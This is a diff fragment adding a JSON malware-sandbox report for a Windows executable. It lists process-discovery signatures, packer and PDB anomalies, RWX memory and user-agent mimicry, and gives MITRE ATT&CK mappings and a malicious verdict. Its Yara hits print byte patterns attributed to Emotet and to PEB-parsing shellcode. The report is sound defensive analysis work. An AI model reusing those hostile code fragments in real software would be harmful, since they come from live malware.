+ "cid": 2227 + }, + { + "type": "call", + "pid": 9436, + "cid": 2228 + }, + { + "type": "call", + "pid": 9436, + "cid": 2229 + }, + { + "type": "call", + "pid": 9436, + "cid": 2230 + }, + { + "type": "call", + "pid": 9436, + "cid": 2231 + }, + { + "type": "call", + "pid": 9436, + "cid": 2232 + }, + { + "type": "call", + "pid": 9436, + "cid": 2233 + }, + { + "type": "call", + "pid": 9436, + "cid": 2234 + }, + { + "type": "call", + "pid": 9436, + "cid": 2235 + }, + { + "type": "call", + "pid": 9436, + "cid": 2236 + }, + { + "type": "call", + "pid": 9436, + "cid": 2237 + }, + { + "type": "call", + "pid": 9436, + "cid": 2238 + }, + { + "type": "call", + "pid": 9436, + "cid": 2239 + }, + { + "type": "call", + "pid": 9436, + "cid": 2240 + }, + { + "type": "call", + "pid": 9436, + "cid": 2241 + }, + { + "type": "call", + "pid": 9436, + "cid": 2242 + }, + { + "type": "call", + "pid": 9436, + "cid": 2243 + }, + { + "type": "call", + "pid": 9436, + "cid": 2244 + }, + { + "type": "call", + "pid": 9436, + "cid": 2245 + }, + { + "type": "call", + "pid": 9436, + "cid": 2246 + }, + { + "type": "call", + "pid": 9436, + "cid": 2247 + }, + { + "type": "call", + "pid": 9436, + "cid": 2248 + }, + { + "type": "call", + "pid": 9436, + "cid": 2249 + }, + { + "type": "call", + "pid": 9436, + "cid": 2250 + }, + { + "type": "call", + "pid": 9436, + "cid": 2251 + }, + { + "type": "call", + "pid": 9436, + "cid": 2252 + }, + { + "type": "call", + "pid": 9436, + "cid": 2253 + }, + { + "type": "call", + "pid": 9436, + "cid": 2254 + }, + { + "type": "call", + "pid": 9436, + "cid": 2255 + }, + { + "type": "call", + "pid": 9436, + "cid": 2256 + }, + { + "type": "call", + "pid": 9436, + "cid": 2257 + }, + { + "type": "call", + "pid": 9436, + "cid": 2258 + }, + { + "type": "call", + "pid": 9436, + "cid": 2259 + }, + { + "type": "call", + "pid": 9436, + "cid": 2260 + }, + { + "type": "call", + "pid": 9436, + "cid": 2261 + }, + { + "type": "call", + "pid": 9436, + "cid": 2262 + }, + { + "type": "call", + "pid": 9436, + "cid": 2263 + }, + { + "type": "call", + "pid": 9436, + "cid": 2264 + }, + { + "type": "call", + "pid": 9436, + "cid": 2265 + }, + { + "type": "call", + "pid": 9436, + "cid": 2266 + }, + { + "type": "call", + "pid": 9436, + "cid": 2267 + }, + { + "type": "call", + "pid": 9436, + "cid": 2268 + }, + { + "type": "call", + "pid": 9436, + "cid": 2269 + }, + { + "type": "call", + "pid": 9436, + "cid": 2270 + }, + { + "type": "call", + "pid": 9436, + "cid": 2271 + }, + { + "type": "call", + "pid": 9436, + "cid": 2272 + }, + { + "type": "call", + "pid": 9436, + "cid": 2273 + }, + { + "type": "call", + "pid": 9436, + "cid": 2274 + }, + { + "type": "call", + "pid": 9436, + "cid": 2275 + }, + { + "type": "call", + "pid": 9436, + "cid": 2276 + }, + { + "type": "call", + "pid": 9436, + "cid": 2277 + }, + { + "type": "call", + "pid": 9436, + "cid": 2278 + }, + { + "type": "call", + "pid": 9436, + "cid": 2279 + }, + { + "type": "call", + "pid": 9436, + "cid": 2280 + }, + { + "type": "call", + "pid": 9436, + "cid": 2281 + }, + { + "type": "call", + "pid": 9436, + "cid": 2282 + }, + { + "type": "call", + "pid": 9436, + "cid": 2283 + }, + { + "type": "call", + "pid": 9436, + "cid": 2284 + }, + { + "type": "call", + "pid": 9436, + "cid": 2285 + }, + { + "type": "call", + "pid": 9436, + "cid": 2286 + }, + { + "type": "call", + "pid": 9436, + "cid": 2287 + }, + { + "type": "call", + "pid": 9436, + "cid": 2288 + }, + { + "type": "call", + "pid": 9436, + "cid": 2289 + }, + { + "type": "call", + "pid": 9436, + "cid": 2290 + }, + { + "type": "call", + "pid": 9436, + "cid": 2291 + }, + { + "type": "call", + "pid": 9436, + "cid": 2292 + }, + { + "type": "call", + "pid": 9436, + "cid": 2293 + }, + { + "type": "call", + "pid": 9436, + "cid": 2294 + }, + { + "type": "call", + "pid": 9436, + "cid": 2295 + }, + { + "type": "call", + "pid": 9436, + "cid": 2296 + }, + { + "type": "call", + "pid": 9436, + "cid": 2297 + }, + { + "type": "call", + "pid": 9436, + "cid": 2298 + }, + { + "type": "call", + "pid": 9436, + "cid": 2299 + }, + { + "type": "call", + "pid": 9436, + "cid": 2300 + }, + { + "type": "call", + "pid": 9436, + "cid": 2301 + }, + { + "type": "call", + "pid": 9436, + "cid": 2302 + }, + { + "type": "call", + "pid": 9436, + "cid": 2303 + }, + { + "type": "call", + "pid": 9436, + "cid": 2304 + }, + { + "type": "call", + "pid": 9436, + "cid": 2305 + }, + { + "type": "call", + "pid": 9436, + "cid": 2306 + }, + { + "type": "call", + "pid": 9436, + "cid": 2307 + }, + { + "type": "call", + "pid": 9436, + "cid": 2308 + }, + { + "type": "call", + "pid": 9436, + "cid": 2309 + }, + { + "type": "call", + "pid": 9436, + "cid": 2310 + }, + { + "type": "call", + "pid": 9436, + "cid": 2311 + }, + { + "type": "call", + "pid": 9436, + "cid": 2312 + }, + { + "type": "call", + "pid": 9436, + "cid": 2313 + }, + { + "type": "call", + "pid": 9436, + "cid": 2314 + }, + { + "type": "call", + "pid": 9436, + "cid": 2315 + }, + { + "type": "call", + "pid": 9436, + "cid": 2316 + }, + { + "type": "call", + "pid": 9436, + "cid": 2317 + }, + { + "type": "call", + "pid": 9436, + "cid": 2318 + }, + { + "type": "call", + "pid": 9436, + "cid": 2319 + }, + { + "type": "call", + "pid": 9436, + "cid": 2320 + }, + { + "type": "call", + "pid": 9436, + "cid": 2321 + }, + { + "type": "call", + "pid": 9436, + "cid": 2322 + }, + { + "type": "call", + "pid": 9436, + "cid": 2323 + }, + { + "type": "call", + "pid": 9436, + "cid": 2324 + }, + { + "type": "call", + "pid": 9436, + "cid": 2325 + }, + { + "type": "call", + "pid": 9436, + "cid": 2326 + }, + { + "type": "call", + "pid": 9436, + "cid": 2327 + }, + { + "type": "call", + "pid": 9436, + "cid": 2328 + }, + { + "type": "call", + "pid": 9436, + "cid": 2329 + }, + { + "type": "call", + "pid": 9436, + "cid": 2330 + }, + { + "type": "call", + "pid": 9436, + "cid": 2331 + }, + { + "type": "call", + "pid": 9436, + "cid": 2332 + }, + { + "type": "call", + "pid": 9436, + "cid": 2333 + }, + { + "type": "call", + "pid": 9436, + "cid": 2334 + }, + { + "type": "call", + "pid": 9436, + "cid": 2335 + }, + { + "type": "call", + "pid": 9436, + "cid": 2336 + }, + { + "type": "call", + "pid": 9436, + "cid": 2337 + }, + { + "type": "call", + "pid": 9436, + "cid": 2338 + }, + { + "type": "call", + "pid": 9436, + "cid": 2339 + }, + { + "type": "call", + "pid": 9436, + "cid": 2340 + }, + { + "type": "call", + "pid": 9436, + "cid": 2405 + }, + { + "type": "call", + "pid": 9436, + "cid": 2406 + }, + { + "type": "call", + "pid": 9436, + "cid": 2407 + }, + { + "type": "call", + "pid": 9436, + "cid": 2408 + }, + { + "type": "call", + "pid": 9436, + "cid": 2409 + }, + { + "type": "call", + "pid": 9436, + "cid": 2410 + }, + { + "type": "call", + "pid": 9436, + "cid": 2411 + }, + { + "type": "call", + "pid": 9436, + "cid": 2412 + }, + { + "type": "call", + "pid": 9436, + "cid": 2413 + }, + { + "type": "call", + "pid": 9436, + "cid": 2414 + }, + { + "type": "call", + "pid": 9436, + "cid": 2415 + }, + { + "type": "call", + "pid": 9436, + "cid": 2416 + }, + { + "type": "call", + "pid": 9436, + "cid": 2417 + }, + { + "type": "call", + "pid": 9436, + "cid": 2418 + }, + { + "type": "call", + "pid": 9436, + "cid": 2419 + }, + { + "type": "call", + "pid": 9436, + "cid": 2420 + }, + { + "type": "call", + "pid": 9436, + "cid": 2421 + }, + { + "type": "call", + "pid": 9436, + "cid": 2422 + }, + { + "type": "call", + "pid": 9436, + "cid": 2423 + }, + { + "type": "call", + "pid": 9436, + "cid": 2424 + }, + { + "type": "call", + "pid": 9436, + "cid": 2425 + }, + { + "type": "call", + "pid": 9436, + "cid": 2426 + }, + { + "type": "call", + "pid": 9436, + "cid": 2427 + }, + { + "type": "call", + "pid": 9436, + "cid": 2428 + }, + { + "type": "call", + "pid": 9436, + "cid": 2429 + }, + { + "type": "call", + "pid": 9436, + "cid": 2430 + }, + { + "type": "call", + "pid": 9436, + "cid": 2431 + }, + { + "type": "call", + "pid": 9436, + "cid": 2432 + }, + { + "type": "call", + "pid": 9436, + "cid": 2433 + }, + { + "type": "call", + "pid": 9436, + "cid": 2434 + }, + { + "type": "call", + "pid": 9436, + "cid": 2435 + }, + { + "type": "call", + "pid": 9436, + "cid": 2436 + }, + { + "type": "call", + "pid": 9436, + "cid": 2437 + }, + { + "type": "call", + "pid": 9436, + "cid": 2438 + }, + { + "type": "call", + "pid": 9436, + "cid": 2439 + }, + { + "type": "call", + "pid": 9436, + "cid": 2440 + }, + { + "type": "call", + "pid": 9436, + "cid": 2441 + }, + { + "type": "call", + "pid": 9436, + "cid": 2442 + }, + { + "type": "call", + "pid": 9436, + "cid": 2443 + }, + { + "type": "call", + "pid": 9436, + "cid": 2444 + }, + { + "type": "call", + "pid": 9436, + "cid": 2445 + }, + { + "type": "call", + "pid": 9436, + "cid": 2446 + }, + { + "type": "call", + "pid": 9436, + "cid": 2447 + }, + { + "type": "call", + "pid": 9436, + "cid": 2448 + }, + { + "type": "call", + "pid": 9436, + "cid": 2449 + }, + { + "type": "call", + "pid": 9436, + "cid": 2450 + }, + { + "type": "call", + "pid": 9436, + "cid": 2451 + }, + { + "type": "call", + "pid": 9436, + "cid": 2452 + }, + { + "type": "call", + "pid": 9436, + "cid": 2453 + }, + { + "type": "call", + "pid": 9436, + "cid": 2454 + }, + { + "type": "call", + "pid": 9436, + "cid": 2455 + }, + { + "type": "call", + "pid": 9436, + "cid": 2456 + }, + { + "type": "call", + "pid": 9436, + "cid": 2457 + }, + { + "type": "call", + "pid": 9436, + "cid": 2458 + }, + { + "type": "call", + "pid": 9436, + "cid": 2459 + }, + { + "type": "call", + "pid": 9436, + "cid": 2460 + }, + { + "type": "call", + "pid": 9436, + "cid": 2461 + }, + { + "type": "call", + "pid": 9436, + "cid": 2462 + }, + { + "type": "call", + "pid": 9436, + "cid": 2463 + }, + { + "type": "call", + "pid": 9436, + "cid": 2464 + }, + { + "type": "call", + "pid": 9436, + "cid": 2465 + }, + { + "type": "call", + "pid": 9436, + "cid": 2466 + }, + { + "type": "call", + "pid": 9436, + "cid": 2467 + }, + { + "type": "call", + "pid": 9436, + "cid": 2468 + }, + { + "type": "call", + "pid": 9436, + "cid": 2469 + }, + { + "type": "call", + "pid": 9436, + "cid": 2470 + }, + { + "type": "call", + "pid": 9436, + "cid": 2471 + }, + { + "type": "call", + "pid": 9436, + "cid": 2472 + }, + { + "type": "call", + "pid": 9436, + "cid": 2473 + }, + { + "type": "call", + "pid": 9436, + "cid": 2474 + }, + { + "type": "call", + "pid": 9436, + "cid": 2475 + }, + { + "type": "call", + "pid": 9436, + "cid": 2476 + }, + { + "type": "call", + "pid": 9436, + "cid": 2477 + }, + { + "type": "call", + "pid": 9436, + "cid": 2478 + }, + { + "type": "call", + "pid": 9436, + "cid": 2479 + }, + { + "type": "call", + "pid": 9436, + "cid": 2480 + }, + { + "type": "call", + "pid": 9436, + "cid": 2481 + }, + { + "type": "call", + "pid": 9436, + "cid": 2482 + }, + { + "type": "call", + "pid": 9436, + "cid": 2483 + }, + { + "type": "call", + "pid": 9436, + "cid": 2484 + }, + { + "type": "call", + "pid": 9436, + "cid": 2485 + }, + { + "type": "call", + "pid": 9436, + "cid": 2486 + }, + { + "type": "call", + "pid": 9436, + "cid": 2487 + }, + { + "type": "call", + "pid": 9436, + "cid": 2488 + }, + { + "type": "call", + "pid": 9436, + "cid": 2489 + }, + { + "type": "call", + "pid": 9436, + "cid": 2490 + }, + { + "type": "call", + "pid": 9436, + "cid": 2491 + }, + { + "type": "call", + "pid": 9436, + "cid": 2492 + }, + { + "type": "call", + "pid": 9436, + "cid": 2493 + }, + { + "type": "call", + "pid": 9436, + "cid": 2494 + }, + { + "type": "call", + "pid": 9436, + "cid": 2495 + }, + { + "type": "call", + "pid": 9436, + "cid": 2496 + }, + { + "type": "call", + "pid": 9436, + "cid": 2497 + }, + { + "type": "call", + "pid": 9436, + "cid": 2498 + }, + { + "type": "call", + "pid": 9436, + "cid": 2499 + }, + { + "type": "call", + "pid": 9436, + "cid": 2500 + }, + { + "type": "call", + "pid": 9436, + "cid": 2501 + }, + { + "type": "call", + "pid": 9436, + "cid": 2502 + }, + { + "type": "call", + "pid": 9436, + "cid": 2503 + }, + { + "type": "call", + "pid": 9436, + "cid": 2504 + }, + { + "type": "call", + "pid": 9436, + "cid": 2505 + }, + { + "type": "call", + "pid": 9436, + "cid": 2506 + }, + { + "type": "call", + "pid": 9436, + "cid": 2507 + }, + { + "type": "call", + "pid": 9436, + "cid": 2508 + }, + { + "type": "call", + "pid": 9436, + "cid": 2509 + }, + { + "type": "call", + "pid": 9436, + "cid": 2510 + }, + { + "type": "call", + "pid": 9436, + "cid": 2511 + }, + { + "type": "call", + "pid": 9436, + "cid": 2512 + }, + { + "type": "call", + "pid": 9436, + "cid": 2513 + }, + { + "type": "call", + "pid": 9436, + "cid": 2514 + }, + { + "type": "call", + "pid": 9436, + "cid": 2515 + }, + { + "type": "call", + "pid": 9436, + "cid": 2516 + }, + { + "type": "call", + "pid": 9436, + "cid": 2517 + }, + { + "type": "call", + "pid": 9436, + "cid": 2518 + }, + { + "type": "call", + "pid": 9436, + "cid": 2519 + }, + { + "type": "call", + "pid": 9436, + "cid": 2520 + }, + { + "type": "call", + "pid": 9436, + "cid": 2521 + }, + { + "type": "call", + "pid": 9436, + "cid": 2522 + }, + { + "type": "call", + "pid": 9436, + "cid": 2523 + }, + { + "type": "call", + "pid": 9436, + "cid": 2524 + }, + { + "type": "call", + "pid": 9436, + "cid": 2525 + }, + { + "type": "call", + "pid": 9436, + "cid": 2526 + }, + { + "type": "call", + "pid": 9436, + "cid": 2527 + }, + { + "type": "call", + "pid": 9436, + "cid": 2528 + }, + { + "type": "call", + "pid": 9436, + "cid": 2529 + }, + { + "type": "call", + "pid": 9436, + "cid": 2530 + }, + { + "type": "call", + "pid": 9436, + "cid": 2531 + }, + { + "type": "call", + "pid": 9436, + "cid": 2532 + }, + { + "type": "call", + "pid": 9436, + "cid": 2533 + }, + { + "type": "call", + "pid": 9436, + "cid": 2534 + }, + { + "type": "call", + "pid": 9436, + "cid": 2535 + }, + { + "type": "call", + "pid": 9436, + "cid": 2536 + }, + { + "type": "call", + "pid": 9436, + "cid": 2537 + }, + { + "type": "call", + "pid": 9436, + "cid": 2538 + }, + { + "type": "call", + "pid": 9436, + "cid": 2539 + }, + { + "type": "call", + "pid": 9436, + "cid": 2540 + }, + { + "type": "call", + "pid": 9436, + "cid": 2541 + }, + { + "type": "call", + "pid": 9436, + "cid": 2542 + }, + { + "type": "call", + "pid": 9436, + "cid": 2543 + }, + { + "type": "call", + "pid": 9436, + "cid": 2544 + }, + { + "type": "call", + "pid": 9436, + "cid": 2545 + }, + { + "type": "call", + "pid": 9436, + "cid": 2546 + }, + { + "type": "call", + "pid": 9436, + "cid": 2547 + }, + { + "type": "call", + "pid": 9436, + "cid": 2548 + }, + { + "type": "call", + "pid": 9436, + "cid": 2549 + }, + { + "type": "call", + "pid": 9436, + "cid": 2550 + }, + { + "process": "3937597df70645ac297e.exe" + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "process_needed", + "description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option", + "categories": [ + "generic" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "type": "call", + "pid": 9436, + "cid": 622 + }, + { + "type": "call", + "pid": 9436, + "cid": 1454 + }, + { + "type": "call", + "pid": 9436, + "cid": 1688 + }, + { + "type": "call", + "pid": 9436, + "cid": 1903 + }, + { + "type": "call", + "pid": 9436, + "cid": 2122 + }, + { + "type": "call", + "pid": 9436, + "cid": 2341 + }, + { + "type": "call", + "pid": 9436, + "cid": 2551 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "packer_unknown_pe_section_name", + "description": "The binary contains an unknown PE section name indicative of packing", + "categories": [ + "packer" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "unknown section": { + "name": ".didat", + "raw_address": "0x00085000", + "virtual_address": "0x00089000", + "virtual_size": "0x00000319", + "size_of_data": "0x00001000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "1.46" + } + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "static_pe_pdbpath", + "description": "The PE file contains a suspicious PDB path", + "categories": [ + "static" + ], + "severity": 2, + "weight": 1, + "confidence": 80, + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html" + ], + "data": [ + { + "anomaly": "the pdb path contains a reference to a development path or term that may suggest a non-enterprise environment development/compilation" + }, + { + "pdbpath": "c:\\Users\\Mr.Anderson\\Desktop\\2003\\13.8.20\\ExpandingCheck_demo\\ExpCheckTest\\Release\\ExpCheckTest.pdb" + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "injection_rwx", + "description": "Creates RWX memory", + "categories": [ + "injection" + ], + "severity": 2, + "weight": 1, + "confidence": 50, + "references": [], + "data": [ + { + "type": "call", + "pid": 9436, + "cid": 341 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "mimics_agent", + "description": "Mimics the system's user agent string for its own requests", + "categories": [ + "stealth" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "type": "call", + "pid": 9436, + "cid": 989 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "procmem_yara", + "description": "Yara detections observed in process dumps, payloads or dropped files", + "categories": [ + "malware" + ], + "severity": 3, + "weight": 4, + "confidence": 100, + "references": [], + "data": [ + { + "Hit": "PID 9436 triggered the Yara rule 'Emotet' with data '['{ 85 C0 74 3D B9 F8 92 40 00 33 D2 89 48 08 89 48 34 8B 48 10 89 50 20 EB 04 41 89 48 10 39 14 CD F8 92 40 00 75 F3 8B CE E8 08 07 00 00 85 C0 74 05 33 C0 40 5E C3 }', '{ EB 04 41 89 48 10 39 14 CD F8 92 40 00 75 F3 }']'" + }, + { + "Hit": "PID 9436 triggered the Yara rule 'Emotet' with data '['{ 85 C0 74 3D B9 F8 92 40 00 33 D2 89 48 08 89 48 34 8B 48 10 89 50 20 EB 04 41 89 48 10 39 14 CD F8 92 40 00 75 F3 8B CE E8 08 07 00 00 85 C0 74 05 33 C0 40 5E C3 }', '{ EB 04 41 89 48 10 39 14 CD F8 92 40 00 75 F3 }']'" + }, + { + "Hit": "PID 9436 triggered the Yara rule 'shellcode_peb_parsing' with data '['{ 64 A1 30 00 00 00 53 55 56 8B 40 0C 57 89 4C 24 18 8B 70 0C E9 8A 00 00 00 8B 46 30 }']'" + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "static_pe_anomaly", + "description": "Anomalous binary characteristics", + "categories": [ + "static" + ], + "severity": 3, + "weight": 1, + "confidence": 80, + "references": [], + "data": [ + { + "anomaly": "Entrypoint of binary is located outside of any mapped sections" + } + ], + "new_data": [], + "alert": false, + "families": [] + } + ], + "malscore": 10.0, + "ttps": [ + { + "signature": "http_request", + "ttps": [ + "T1071" + ], + "mbcs": [ + "OC0006", + "C0002" + ] + }, + { + "signature": "enumerates_running_processes", + "ttps": [ + "T1057" + ], + "mbcs": [ + "OB0007" + ] + }, + { + "signature": "process_interest", + "ttps": [ + "T1057" + ], + "mbcs": [ + "OB0007" + ] + }, + { + "signature": "process_needed", + "ttps": [ + "T1057" + ], + "mbcs": [ + "OB0007" + ] + }, + { + "signature": "packer_unknown_pe_section_name", + "ttps": [ + "T1027.002", + "T1027" + ], + "mbcs": [ + "OB0001", + "OB0002", + "OB0006", + "F0001" + ] + } + ], + "malstatus": "Malicious", + "mitre_attck": { + "Command and Control": [ + { + "t_id": "T1071", + "ttp_name": "Application Layer Protocol", + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", + "signature": [ + "http_request" + ] + } + ], + "Discovery": [ + { + "t_id": "T1057", + "ttp_name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.", + "signature": [ + "enumerates_running_processes", + "process_interest", + "process_needed" + ] + } + ], + "Defense Evasion": [ + { + "t_id": "T1027", + "ttp_name": "Obfuscated Files or Information", + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", + "signature": [ + "packer_unknown_pe_section_name" + ] + }, + { + "t_id": "T1027.002", + "ttp_name": "Software Packing", + "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) ", + "signature": [ + "packer_unknown_pe_section_name" + ] + } + ] + } +} \ No newline at end of file